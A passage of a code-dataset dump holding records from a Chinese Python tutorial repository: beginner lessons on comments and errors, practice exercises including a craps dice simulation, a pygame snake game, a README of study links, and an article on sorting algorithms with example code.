--version\n```\n\n当然也可以先输入`python`或`python3`进入交互式环境,再执行以下的代码检查Python的版本。\n\n```\nimport sys\n\nprint(sys.version_info)\nprint(sys.version)\n```\n\n\n\n### 第一个Python程序\n\n#### 我们可以现在Python自带的idle中写我们的代码\n\n\n\n#### PyCharm - Python开发神器\n\n### 1) 集成开发环境(IDE)\n\n集成开发环境(`IDE`,Integrated Development Environment)—— **集成了开发软件需要的所有工具**,一般包括以下工具:\n\n- 图形用户界面\n- 代码编辑器(支持 **代码补全**/**自动缩进**)\n- 编译器/解释器\n- 调试器(**断点**/**单步执行**)\n- ……\n\n### 2)PyCharm 介绍\n\n- `PyCharm` 是 Python 的一款非常优秀的集成开发环境\n\n- `PyCharm` 除了具有一般 IDE 所必备功能外,还可以在 `Windows`、`Linux`、`macOS` 下使用\n\n- ```\n PyCharm\n ```\n\n \n\n 适合开发大型项目\n\n - 一个项目通常会包含 **很多源文件**\n - 每个 **源文件** 的代码行数是有限的,通常在几百行之内\n - 每个 **源文件** 各司其职,共同完成复杂的业务功能\n\n\n\n- **文件导航区域** 能够 **浏览**/**定位**/**打开** 项目文件\n\n- **文件编辑区域** 能够 **编辑** 当前打开的文件\n\n- 控制台区域\n\n \n\n 能够:\n\n - 输出程序执行内容\n - 跟踪调试代码的执行\n\n- 右上角的 **工具栏** 能够 **执行(SHIFT + F10)** / **调试(SHIFT + F9)** 代码\n\n\n\n- 通过控制台上方的**单步执行按钮(F8)**,可以单步执行代码\n\n\n\n\n\n### 注释\n\n- 注释的作用\n- 单行注释(行注释)\n- 多行注释(块注释)\n\n## 01. 注释的作用\n\n> 使用用自己熟悉的语言,在程序中对某些代码进行标注说明,增强程序的可读性\n\n## 单行注释(行注释)\n\n- 以 `#` 开头,`#` 右边的所有东西都被当做说明文字,而不是真正要执行的程序,只起到辅助说明作用\n- 示例代码如下:\n\n```\n# 这是第一个单行注释\nprint(\"hello python\")\n```\n\n> 为了保证代码的可读性,`#` 后面建议先添加一个空格,然后再编写相应的说明文字\n\n### 在代码后面增加的单行注释\n\n- 在程序开发时,同样可以使用 `#` 在代码的后面(旁边)增加说明性的文字\n- 但是,需要注意的是,**为了保证代码的可读性**,**注释和代码之间** 至少要有 **两个空格**\n- 示例代码如下:\n\n```\nprint(\"hello python\") # 输出 `hello python`\n```\n\n## 多行注释(块注释)\n\n- 如果希望编写的 **注释信息很多,一行无法显示**,就可以使用多行注释\n- 要在 Python 程序中使用多行注释,可以用 **一对 连续的 三个 引号**(单引号和双引号都可以)\n- 示例代码如下:\n\n```\n\"\"\"\n这是一个多行注释\n\n在多行注释之间,可以写很多很多的内容……\n\"\"\" \nprint(\"hello python\")\n```\n\n### 什么时候需要使用注释?\n\n1. **注释不是越多越好**,对于一目了然的代码,不需要添加注释\n2. 对于 **复杂的操作**,应该在操作开始前写上若干行注释\n3. 对于 **不是一目了然的代码**,应在其行尾添加注释(为了提高可读性,注释应该至少离开代码 2 个空格)\n4. 绝不要描述代码,假设阅读代码的人比你更懂 Python,他只是不知道你的代码要做什么\n\n> 在一些正规的开发团队,通常会有 **代码审核** 的惯例,就是一个团队中彼此阅读对方的代码\n\n### 关于代码规范\n\n- `Python` 官方提供有一系列 PEP(Python Enhancement Proposals) 文档\n- 其中第 8 篇文档专门针对 **Python 的代码格式** 给出了建议,也就是俗称的 **PEP 8**\n- 文档地址:https://www.python.org/dev/peps/pep-0008/\n- 谷歌有对应的中文文档:http://zh-google-styleguide.readthedocs.io/en/latest/google-python-styleguide/python_style_rules/\n\n> 任何语言的程序员,编写出符合规范的代码,是开始程序生涯的第一步\n\n\n\n\n\n### 拓展 -- 认识一下一些错误\n\n#### 关于错误\n\n- 编写的程序**不能正常执行**,或者**执行的结果不是我们期望的**\n\n- 俗称\n\n \n\n ```\n BUG\n ```\n\n ,是程序员在开发时非常常见的,初学者常见错误的原因包括:\n\n 1. 手误\n 2. 对已经学习过的知识理解还存在不足\n 3. 对语言还有需要学习和提升的内容\n\n- 在学习语言时,不仅要**学会语言的语法**,而且还要**学会如何认识错误和解决错误的方法**\n\n> 每一个程序员都是在不断地修改错误中成长的\n\n#### 第一个演练中的常见错误\n\n- 1> **手误**,例如使用 `pirnt(\"Hello world\")`\n\n```\nNameError: name 'pirnt' is not defined\n\n名称错误:'pirnt' 名字没有定义\n```\n\n- 2> 将多条 `print` 写在一行\n\n```\nSyntaxError: invalid syntax\n\n语法错误:语法无效\n```\n\n> 每行代码负责完成一个动作\n\n- 3> 缩进错误\n\n```\nIndentationError: unexpected indent\n\n缩进错误:不期望出现的缩进\n```\n\n> - Python 是一个格式非常严格的程序设计语言\n> - 目前而言,大家记住每行代码前面都不要增加空格\n\n#### 单词列表\n\n```\n* error 错误\n* name 名字\n* defined 已经定义\n* syntax 语法\n* invalid 无效\n* Indentation 索引\n* unexpected 意外的,不期望的\n* character 字符\n* line 行\n* encoding 编码\n* declared 声明\n* details 细节,详细信息\n* ASCII 一种字符编码\n```\n\n\n\n\n\n### 练习\n\n让我们一起得到Python之禅\n\n1.在Python交互式环境中输入下面的代码并查看结果\n\n```\nimport this\n```\n\n\n\n2. 学习使用turtle在屏幕上绘制图形。\n\n> **说明**:turtle是Python内置的一个非常有趣的模块,特别适合对计算机程序设计进行初体验的小伙伴,它最早是Logo语言的一部分,Logo语言是Wally Feurzig和Seymour Papert在1966发明的编程语言。\n\n```\nimport turtle\n\nturtle.pensize(4)\nturtle.pencolor('red')\n\n\nturtle.right(90)\n\nturtle.right(90)\nturtle.forward(100)\nturtle.right(90)\nturtle.forward(100)\n\nturtle.mainloop()\n```\n\n\n"
},
{
"alpha_fraction": 0.5497939586639404,
"alphanum_fraction": 0.5896291136741638,
"avg_line_length": 27.831684112548828,
"blob_id": "fc1a0154d19437826c82f085fe2688607fadd189",
"content_id": "5e03defd9cc930b8d22f45cbb5615049f5481c55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5034,
"license_type": "permissive",
"max_line_length": 243,
"num_lines": 101,
"path": "/Python基础连载/综合练习.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:综合练习\n\n学完前面的几个章节后,我觉得有必要在这里带大家做一些练习来巩固之前所学的知识,虽然迄今为止我们学习的内容只是Python的冰山一角,但是这些内容已经足够我们来构建程序中的逻辑。对于编程语言的初学者来说,在学习了Python的核心语言元素(变量、类型、运算符、表达式、分支结构、循环结构等)之后,必须做的一件事情就是尝试用所学知识去解决现实中的问题,换句话说就是锻炼自己把用人类自然语言描述的算法(解决问题的方法和步骤)翻译成Python代码的能力,而这件事情必须通过大量的练习才能达成。\n\n我们在本章为大家整理了一些经典的案例和习题,希望通过这些例子,一方面帮助大家巩固之前所学的Python知识,另一方面帮助大家了解如何建立程序中的逻辑以及如何运用一些简单的算法解决现实中的问题。\n\n### 经典的例子\n\n1. 寻找**水仙花数**。\n\n > **说明**:水仙花数也被称为超完全数字不变数、自恋数、自幂数、阿姆斯特朗数,它是一个3位数,该数字每个位上数字的立方之和正好等于它本身,例如:$1^3 + 5^3+ 3^3=153$。\n\n ```\n \"\"\"\n 找出所有水仙花数\n \n \"\"\"\n \n for num in range(100, 1000):\n low = num % 10\n mid = num // 10 % 10\n high = num // 100\n if num == low ** 3 + mid ** 3 + high ** 3:\n print(num)\n ```\n\n 在上面的代码中,我们通过整除和求模运算分别找出了一个三位数的个位、十位和百位,这种小技巧在实际开发中还是常用的。用类似的方法,我们还可以实现将一个正整数反转,例如:将12345变成54321,代码如下所示。\n\n ```\n \"\"\"\n 正整数的反转\n \"\"\"\n \n num = int(input('num = '))\n reversed_num = 0\n while num > 0:\n reversed_num = reversed_num * 10 + num % 10\n num //= 10\n print(reversed_num)\n ```\n\n2. **百钱百鸡**问题。\n\n > **说明**:百钱百鸡是我国古代数学家[张丘建](https://baike.baidu.com/item/张丘建/10246238)在《算经》一书中提出的数学问题:鸡翁一值钱五,鸡母一值钱三,鸡雏三值钱一。百钱买百鸡,问鸡翁、鸡母、鸡雏各几何?翻译成现代文是:公鸡5元一只,母鸡3元一只,小鸡1元三只,用100块钱买一百只鸡,问公鸡、母鸡、小鸡各有多少只?\n\n ```\n for x in range(0, 20):\n for y in range(0, 33):\n z = 100 - x - y\n if 5 * x + 3 * y + z / 3 == 100:\n print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z))\n ```\n\n 上面使用的方法叫做**穷举法**,也称为**暴力搜索法**,这种方法通过一项一项的列举备选解决方案中所有可能的候选项并检查每个候选项是否符合问题的描述,最终得到问题的解。这种方法看起来比较笨拙,但对于运算能力非常强大的计算机来说,通常都是一个可行的甚至是不错的选择,而且问题的解如果存在,这种方法一定能够找到它。\n\n3. **CRAPS赌博游戏**。\n\n > **说明**:CRAPS又称花旗骰,是美国拉斯维加斯非常受欢迎的一种的桌上赌博游戏。该游戏使用两粒骰子,玩家通过摇两粒骰子获得点数进行游戏。简单的规则是:玩家第一次摇骰子如果摇出了7点或11点,玩家胜;玩家第一次如果摇出2点、3点或12点,庄家胜;其他点数玩家继续摇骰子,如果玩家摇出了7点,庄家胜;如果玩家摇出了第一次摇的点数,玩家胜;其他点数,玩家继续要骰子,直到分出胜负。\n\n ```\n \"\"\"\n Craps赌博游戏\n 我们设定玩家开始游戏时有1000元的赌注\n 游戏结束的条件是玩家输光所有的赌注\n \"\"\"\n from random import randint\n \n money = 1000\n while money > 0:\n print('你的总资产为:', money)\n needs_go_on = False\n while True:\n debt = int(input('请下注: '))\n if 0 < debt <= money:\n break\n first = randint(1, 6) + randint(1, 6)\n print('玩家摇出了%d点' % first)\n if first == 7 or first == 11:\n print('玩家胜!')\n money += debt\n elif first == 2 or first == 3 or first == 12:\n print('庄家胜!')\n money -= debt\n else:\n needs_go_on = True\n while needs_go_on:\n needs_go_on = False\n current = randint(1, 6) + randint(1, 6)\n print('玩家摇出了%d点' % current)\n if current == 7:\n print('庄家胜')\n money -= debt\n elif current == first:\n print('玩家胜')\n money += debt\n else:\n needs_go_on = True\n print('你破产了, 游戏结束!')\n ```\n\n\n"
},
{
"alpha_fraction": 0.6187565326690674,
"alphanum_fraction": 0.6433810591697693,
"avg_line_length": 29.136842727661133,
"blob_id": "988931c6bba8b9908188d2b6e0ee7b989e421a18",
"content_id": "3f58324f8438bce61d7a2b26d3fc54ce50debed5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6560,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 190,
"path": "/code/snake.py",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "## 导入相关模块\nimport random\nimport pygame\nimport sys\n\nfrom pygame.locals import *\n\n\nsnake_speed = 15 #贪吃蛇的速度\nwindows_width = 800\nwindows_height = 600 #游戏窗口的大小\ncell_size = 20 #贪吃蛇身体方块大小,注意身体大小必须能被窗口长宽整除\n\n''' #初始化区\n由于我们的贪吃蛇是有大小尺寸的, 因此地图的实际尺寸是相对于贪吃蛇的大小尺寸而言的\n'''\nmap_width = int(windows_width / cell_size)\nmap_height = int(windows_height / cell_size)\n\n# 颜色定义\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\ngray = (230, 230, 230)\ndark_gray = (40, 40, 40)\nDARKGreen = (0, 155, 0)\nGreen = (0, 255, 0)\nRed = (255, 0, 0)\nblue = (0, 0, 255)\ndark_blue =(0,0, 139)\n\n\nBG_COLOR = black #游戏背景颜色\n\n# 定义方向\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\nHEAD = 0 #贪吃蛇头部下标\n#主函数\ndef main():\n\tpygame.init() # 模块初始化\n\tsnake_speed_clock = pygame.time.Clock() # 创建Pygame时钟对象\n\tscreen = pygame.display.set_mode((windows_width, windows_height)) #\n\tscreen.fill(white)\n\n\tpygame.display.set_caption(\"Python 贪吃蛇小游戏\") #设置标题\n\tshow_start_info(screen) #欢迎信息\n\twhile True:\n\t\trunning_game(screen, snake_speed_clock)\n\t\tshow_gameover_info(screen)\n#游戏运行主体\ndef running_game(screen,snake_speed_clock):\n\tstartx = random.randint(3, map_width - 8) #开始位置\n\tstarty = random.randint(3, map_height - 8)\n\tsnake_coords = [{'x': startx, 'y': starty}, #初始贪吃蛇\n {'x': startx - 1, 'y': starty},\n {'x': startx - 2, 'y': starty}]\n\n\tdirection = RIGHT # 开始时向右移动\n\n\tfood = get_random_location() #实物随机位置\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate()\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif (event.key == K_LEFT or event.key == K_a) and direction != RIGHT:\n\t\t\t\t\tdirection = LEFT\n\t\t\t\telif (event.key == K_RIGHT or event.key == K_d) and direction != LEFT:\n\t\t\t\t\tdirection = RIGHT\n\t\t\t\telif (event.key == K_UP or event.key == K_w) and direction != DOWN:\n\t\t\t\t\tdirection = UP\n\t\t\t\telif (event.key == K_DOWN or event.key == K_s) and direction != UP:\n\t\t\t\t\tdirection = DOWN\n\t\t\t\telif event.key == K_ESCAPE:\n\t\t\t\t\tterminate()\n\n\t\tmove_snake(direction, snake_coords) #移动蛇\n\n\t\tret = snake_is_alive(snake_coords)\n\t\tif not ret:\n\t\t\tbreak #蛇跪了. 游戏结束\n\t\tsnake_is_eat_food(snake_coords, food) #判断蛇是否吃到食物\n\n\t\tscreen.fill(BG_COLOR)\n\t\t#draw_grid(screen)\n\t\tdraw_snake(screen, snake_coords)\n\t\tdraw_food(screen, food)\n\t\tdraw_score(screen, len(snake_coords) - 3)\n\t\tpygame.display.update()\n\t\tsnake_speed_clock.tick(snake_speed) #控制fps\n#将食物画出来\ndef draw_food(screen, food):\n\tx = food['x'] * cell_size\n\ty = food['y'] * cell_size\n\tappleRect = pygame.Rect(x, y, cell_size, cell_size)\n\tpygame.draw.rect(screen, Red, appleRect)\n#将贪吃蛇画出来\ndef draw_snake(screen, snake_coords):\n\tfor coord in snake_coords:\n\t\tx = coord['x'] * cell_size\n\t\ty = coord['y'] * cell_size\n\t\twormSegmentRect = pygame.Rect(x, y, cell_size, cell_size)\n\t\tpygame.draw.rect(screen, dark_blue, wormSegmentRect)\n\t\twormInnerSegmentRect = pygame.Rect( #蛇身子里面的第二层亮绿色\n\t\t\tx + 4, y + 4, cell_size - 8, cell_size - 8)\n\t\tpygame.draw.rect(screen, blue, wormInnerSegmentRect)\n#移动贪吃蛇\ndef move_snake(direction, snake_coords):\n if direction == UP:\n newHead = {'x': snake_coords[HEAD]['x'], 'y': snake_coords[HEAD]['y'] - 1}\n elif direction == DOWN:\n newHead = {'x': snake_coords[HEAD]['x'], 'y': snake_coords[HEAD]['y'] + 1}\n elif direction == LEFT:\n newHead = {'x': snake_coords[HEAD]['x'] - 1, 'y': snake_coords[HEAD]['y']}\n elif direction == RIGHT:\n newHead = {'x': snake_coords[HEAD]['x'] + 1, 'y': snake_coords[HEAD]['y']}\n\n snake_coords.insert(0, newHead)\n#判断蛇死了没\ndef snake_is_alive(snake_coords):\n\ttag = True\n\tif snake_coords[HEAD]['x'] == -1 or snake_coords[HEAD]['x'] == map_width or snake_coords[HEAD]['y'] == -1 or \\\n\t\t\tsnake_coords[HEAD]['y'] == map_height:\n\t\ttag = False # 蛇碰壁啦\n\tfor snake_body in snake_coords[1:]:\n\t\tif snake_body['x'] == snake_coords[HEAD]['x'] and snake_body['y'] == snake_coords[HEAD]['y']:\n\t\t\ttag = False # 蛇碰到自己身体啦\n\treturn tag\n#判断贪吃蛇是否吃到食物\ndef snake_is_eat_food(snake_coords, food): #如果是列表或字典,那么函数内修改参数内容,就会影响到函数体外的对象。\n\tif snake_coords[HEAD]['x'] == food['x'] and snake_coords[HEAD]['y'] == food['y']:\n\t\tfood['x'] = random.randint(0, map_width - 1)\n\t\tfood['y'] = random.randint(0, map_height - 1) # 实物位置重新设置\n\telse:\n\t\tdel snake_coords[-1] # 如果没有吃到实物, 就向前移动, 那么尾部一格删掉\n#食物随机生成\ndef get_random_location():\n\treturn {'x': random.randint(0, map_width - 1), 'y': random.randint(0, map_height - 1)}\n#开始信息显示\ndef show_start_info(screen):\n\tfont = pygame.font.Font('myfont.ttf', 40)\n\ttip = font.render('按任意键开始游戏~~~', True, (65, 105, 225))\n\tgamestart = pygame.image.load('gamestart.png')\n\tscreen.blit(gamestart, (140, 30))\n\tscreen.blit(tip, (240, 550))\n\tpygame.display.update()\n\n\twhile True: #键盘监听事件\n\t\tfor event in pygame.event.get(): # event handling loop\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate() #终止程序\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif (event.key == K_ESCAPE): #终止程序\n\t\t\t\t\tterminate() #终止程序\n\t\t\t\telse:\n\t\t\t\t\treturn #结束此函数, 开始游戏\n#游戏结束信息显示\ndef show_gameover_info(screen):\n\tfont = pygame.font.Font('myfont.ttf', 40)\n\ttip = font.render('按Q或者ESC退出游戏, 按任意键重新开始游戏~', True, (65, 105, 225))\n\tgamestart = pygame.image.load('gameover.png')\n\tscreen.blit(gamestart, (60, 0))\n\tscreen.blit(tip, (80, 300))\n\tpygame.display.update()\n\n\twhile True: #键盘监听事件\n\t\tfor event in pygame.event.get(): # event handling loop\n\t\t\tif event.type == QUIT:\n\t\t\t\tterminate() #终止程序\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tif event.key == K_ESCAPE or event.key == K_q: #终止程序\n\t\t\t\t\tterminate() #终止程序\n\t\t\t\telse:\n\t\t\t\t\treturn #结束此函数, 重新开始游戏\n#画成绩\ndef draw_score(screen,score):\n\tfont = pygame.font.Font('myfont.ttf', 30)\n\tscoreSurf = font.render('得分: %s' % score, True, Green)\n\tscoreRect = scoreSurf.get_rect()\n\tscoreRect.topleft = (windows_width - 120, 10)\n\tscreen.blit(scoreSurf, scoreRect)\n#程序终止\ndef terminate():\n\tpygame.quit()\n\tsys.exit()\nmain()\n"
},
{
"alpha_fraction": 0.6468493938446045,
"alphanum_fraction": 0.7369170784950256,
"avg_line_length": 30.920454025268555,
"blob_id": "67bae7b641709aae9296a659a13b272ed238bec5",
"content_id": "65c3781917f621c4e93c7ca7ba075e430b3e7827",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3769,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 88,
"path": "/README.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "> 介绍:本仓库为自己学习过程中,汇集的知识点和一些面试经验等。如果对大家有帮助,请多多star,谢谢各位!\n\n## 资源获取\n上百本计算机书籍pdf收集\n> https://github.com/hellgoddess/ITBook\n\n获取Python100道练习题\n> https://github.com/hellgoddess/PythonGuide/tree/main/Python100%E9%81%93%E7%BB%83%E4%B9%A0%E9%A2%98\n\n思维导图\n> 链接:https://pan.baidu.com/s/1Gc7A9qdXnfqVkEJl2-PhaA 提取码:k063 Python思维导图\n\n> 链接:https://pan.baidu.com/s/1SJKo-DArTU1JHgd7e4mOTg 提取码:du5o MySQL思维导图\n\n\n计算机网络pdf:\n> 链接: https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E8%8E%B7%E5%8F%96%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9Cpdf.md\n\n# Python\n## 基础\n#### 知识点/面试题(必看:muscle:)\n1. [python基础连载系列](https://github.com/hellgoddess/PythonGuide/tree/main/Python%E5%9F%BA%E7%A1%80%E8%BF%9E%E8%BD%BD)(点击跳转到页面::heartpulse:)\n2. [python常见面试题汇总](https://github.com/hellgoddess/PythonGuide/blob/main/docs/python_%20Interview.md)\n3. [十二张Python思维导图带你学会Python](https://mp.weixin.qq.com/s/cTi12tOugs8y52hmBBTafg) 高清图片获取在gihub顶部\n\n#### 重要知识点讲解:\n1. [python的生成器,迭代器和装饰器详解](https://mp.weixin.qq.com/s/hKMk285LRmGt7nDbMdepXw)\n2. [一文读懂python68个内置函数](https://mp.weixin.qq.com/s/vtMHgt6kknU94fVZwfWjUA)\n3. [学了这么久Python,你知道Python有多少关键字吗?硬核总结来了!](https://mp.weixin.qq.com/s/tIaegWbFC-sHawKBmaiwnw)\n4. [Python魔法方法指南](https://pyzh.readthedocs.io/en/latest/python-magic-methods-guide.html#id8)\n\n#### python的容器分析:\n\n\n#### python并发编程:\n1. [python多线程多进程详解](https://mp.weixin.qq.com/s/2aA7ke4lpcpdLK0etDmK4g)\n\n#### python垃圾回收机制:\n\n## 网络\n1. [一文搞定HTTP面试内容-上](https://mp.weixin.qq.com/s/7sO8CteDjkz2d6y4jX2eNQ)\n2. [一文搞定HTTP面试内容-下](https://mp.weixin.qq.com/s/1Umm6Ror1z-7oBCEBe6o5g)\n3. [60道计算机网络面试题请你查收~(上)(1-30](https://mp.weixin.qq.com/s/NAE4Lzvu8LO1Q6GrrdZHxg)\n4. [60道计算机网络面试题请你查收~(下)(31-61](https://mp.weixin.qq.com/s/LcnOAdKq_8qG8hJ6ORAVsw)\n\n## 操作系统\n\n\n### 数据结构与算法\n#### 常见数据结构\n#### 算法\n\n+ [算法学习和书籍推荐](https://www.zhihu.com/question/323359308/answer/1545320858)\n+ [如何刷Leetcode](https://www.zhihu.com/question/31092580/answer/1534887374)\n\n算法总结:\n\n1.[一文学会Python十大排序算法](https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E4%B8%80%E6%96%87%E5%AD%A6%E4%BC%9APython%E5%8D%81%E5%A4%A7%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95.md)\n\n\n## 数据库\n#### MySQL\n#### 总结:\n1.[MySQL知识思维导图总结!](https://mp.weixin.qq.com/s/aMWgviKYMOX4GJ_ZfhJJXA)\n\n2.[一千行MySQL命令](https://github.com/hellgoddess/PythonGuide/blob/main/docs/%E4%B8%80%E5%8D%83%E8%A1%8CMySQL%E5%91%BD%E4%BB%A4.md)\n\n3.[MySQL高性能优化规范建议](https://github.com/hellgoddess/PythonGuide/blob/main/docs/MySQL%E9%AB%98%E6%80%A7%E8%83%BD%E4%BC%98%E5%8C%96%E8%A7%84%E8%8C%83%E5%BB%BA%E8%AE%AE.md)\n\n#### 重要知识点:\n#### 面经问题总结:\n#### Redis\n\n## 常见应用\n\n#### 爬虫学习与实战:\n1.[从0到1学习爬虫-爬虫是什么,爬虫能吃吗?](https://mp.weixin.qq.com/s/ObfZMqEPAO8Ap78wRGN3rw)\n#### Django学习与实战\n#### Flask学习与实战\n\n\n## python学习常见问题汇总\n\n## Python实战与小技巧\n\n> 公众号为:CookDev,文章首发公众号,谢谢大家的关注,一起进步。\n\n\n"
},
{
"alpha_fraction": 0.564165472984314,
"alphanum_fraction": 0.597836971282959,
"avg_line_length": 25.3764705657959,
"blob_id": "07e64d897783b23b135908038dfe418771da6ed6",
"content_id": "82ddba6cac5e5696f26dc9184a60d924968c87a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12355,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 340,
"path": "/docs/一文学会Python十大排序算法.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "## 一文学会Python十大排序算法\n\n> 本文已在个人Github开源项目:[PythonGuide](https://github.com/hellgoddess/PythonGuide)中收录,其中包含Python各个方向的自学编程路线、面试题集合/面经及系列技术文章等,并且不断收集了上百本著名的计算机书籍pdf版本,会不断的更新与完善开源项目...\n>\n> 本文作者:海森堡\n\n\n\n> 关键术语说明\n\n- **稳定** :如果a原本在b前面,而a=b,排序之后a仍然在b的前面;\n- **不稳定** :如果a原本在b的前面,而a=b,排序之后a可能会出现在b的后面;\n- **内排序** :所有排序操作都在内存中完成;\n- **外排序** :由于数据太大,因此把数据放在磁盘中,而排序通过磁盘和内存的数据传输才能进行;\n- **时间复杂度** : 一个算法执行所耗费的时间。\n- **空间复杂度** :运行完一个程序所需内存的大小。\n\n\n\n### 1.冒泡排序(Bubble Sort)\n\n冒泡排序时针对**相邻元素之间**的比较,可以将大的数慢慢“沉底”(数组尾部)\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef bubble_sort(alist):\n \"\"\"冒泡排序\"\"\"\n n = len(alist)\n for j in range(0, n-1):\n count = 0 # 优化排序\n for i in range(0, n-1-j):\n # 班长从头走到尾\n if alist[i] > alist[i+1]:\n alist[i], alist[i+1] = alist[i+1], alist[i]\n count += 1\n if 0 == count:\n break\n\nif __name__ == '__main__':\n li = [9, 8, 7, 6, 2, 3, 4, 1]\n print(li)\n bubble_sort(li)\n print(li)\n```\n\n## 2.选择排序(Selection Sort)\n\n **选择排序(Selection-sort)** 是一种简单直观的排序算法。它的工作原理:首先在未排序序列中找到最小(大)元素,存放到排序序列的起始位置,然后,再从剩余未排序元素中继续寻找最小(大)元素,然后放到已排序序列的末尾。以此类推,直到所有元素均排序完毕。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef select_sort(alist):\n \"\"\"ιζ©ζεΊ\"\"\"\n n = len(alist)\n for j in range(n-1):\n min_index = j\n for i in range(j+1, n):\n if alist[min_index] > alist[i]:\n min_index = i\n alist[j], alist[min_index] = alist[min_index], alist[j]\n```\n\n## 3.插入排序(Insertion Sort)\n\n **插入排序(Insertion-Sort)** 的算法描述是一种简单直观的排序算法。它的工作原理是通过构建有序序列,对于未排序数据,在已排序序列中从后向前扫描,找到相应位置并插入。插入排序在实现上,通常采用in-place排序(即只需用到O(1)的额外空间的排序),因而在从后向前扫描过程中,需要反复把已排序元素逐步向后挪位,为最新元素提供插入空间。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef insertSort(relist):\n len_ = len(relist)\n for i in range(1, len_):\n for j in range(i):\n if relist[i] < relist[j]:\n relist.insert(j,relist[i])\n relist.pop(i+1)\n break\n return relist\n\na = [9,8,7,6,5,4,3,2,1]\nprint(insertSort(a))\n```\n\n## 4.希尔排序(Shell Sort)\n\n**希尔排序是希尔(Donald Shell)** 于1959年提出的一种排序算法。希尔排序也是一种插入排序,它是简单插入排序经过改进之后的一个更高效的版本,也称为缩小增量排序,同时该算法是冲破O(n2)的第一批算法之一。它与插入排序的不同之处在于,它会优先比较距离较远的元素。希尔排序又叫缩小增量排序。\n\n 希尔排序是把记录按下表的一定增量分组,对每组使用直接插入排序算法排序;随着增量逐渐减少,每组包含的关键词越来越多,当增量减至1时,整个文件恰被分成一组,算法便终止。\n\n\n\n```python\ndef shell_sort(nums):\n n = len(nums)\n gap = n // 2\n while gap:\n for i in range(gap, n):\n while i - gap >= 0 and nums[i - gap] > nums[i]:\n nums[i - gap], nums[i] = nums[i], nums[i - gap]\n i -= gap\n gap //= 2\n return nums\n\n```\n\n\n\n## 5. 归并排序(Merge Sort)\n\n **归并排序** 是建立在归并操作上的一种有效的排序算法。该算法是采用分治法(Divide and Conquer)的一个非常典型的应用。归并排序是一种稳定的排序方法。将已有序的子序列合并,得到完全有序的序列;即先使每个子序列有序,再使子序列段间有序。若将两个有序表合并成一个有序表,称为2-路归并。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef merge(left, right):\n result = []\n while left and right:\n result.append(left.pop(0) if left[0] <= right[0] else right.pop(0))\n while left:\n result.append(left.pop(0))\n while right:\n result.append(right.pop(0))\n return result\n\ndef mergeSort(relist):\n if len(relist) <= 1:\n return relist\n mid_index = len(relist)//2\n left = mergeSort(relist[:mid_index])\n right = mergeSort(relist[mid_index:])\n return merge(left, right)\n\nprint(mergeSort([9,8,7,6,5,4]))\n```\n\n## 6.快速排序\n\n **快速排序** 的基本思想:通过一趟排序将待排记录分隔成独立的两部分,其中一部分记录的关键字均比另一部分的关键字小,则可分别对这两部分记录继续进行排序,以达到整个序列有序。\n\n\n\n一\n\n```python\n#-*-coding:utf-8-*-\ndef quick_sort(alist, first, last):\n \"\"\"快速排序\"\"\"\n if first >= last:\n return\n mid_value = alist[first]\n low = first\n high = last\n while low < high:\n while low < high and alist[high] >= mid_value:\n high -= 1\n alist[low] = alist[high]\n\n while low < high and alist[low] < mid_value:\n low += 1\n alist[high] = alist[low]\n # 从循环退出时,low == high\n alist[low] = mid_value\n # 对low左边的列表执行快速排序\n quick_sort(alist, first, low-1)\n # 对low右边的列表执行快速排序\n quick_sort(alist, low+1, last)\n\n\nif __name__ == '__main__':\n li = [0, 6, 7, 9, 8, 6, 2, 3, 1, 4, 5]\n print(li)\n quick_sort(li, 0, len(li)-1)\n print(li)\n```\n\n二:\n\n```python\n#-*-coding:utf-8-*-\ndef quick_sort(nums):\n if not nums:\n return []\n div = nums[0]\n left = quick_sort([l for l in nums[1:] if l <= div])\n right = quick_sort([r for r in nums[1:] if r > div])\n return left + [div] + right\n```\n\n## 7.堆排序(Heap Sort)\n\n **堆排序(Heapsort)** 是指利用堆这种数据结构所设计的一种排序算法。堆积是一个近似完全二叉树的结构,并同时满足堆积的性质:即子结点的键值或索引总是小于(或者大于)它的父节点。\n\n\n\n```python\ndef heap_sort(nums):\n # 调整堆\n # 迭代写法\n def adjust_heap(nums, startpos, endpos):\n newitem = nums[startpos]\n pos = startpos\n childpos = pos * 2 + 1\n while childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and nums[rightpos] >= nums[childpos]:\n childpos = rightpos\n if newitem < nums[childpos]:\n nums[pos] = nums[childpos]\n pos = childpos\n childpos = pos * 2 + 1\n else:\n break\n nums[pos] = newitem\n \n # 递归写法\n def adjust_heap(nums, startpos, endpos):\n pos = startpos\n chilidpos = pos * 2 + 1\n if chilidpos < endpos:\n rightpos = chilidpos + 1\n if rightpos < endpos and nums[rightpos] > 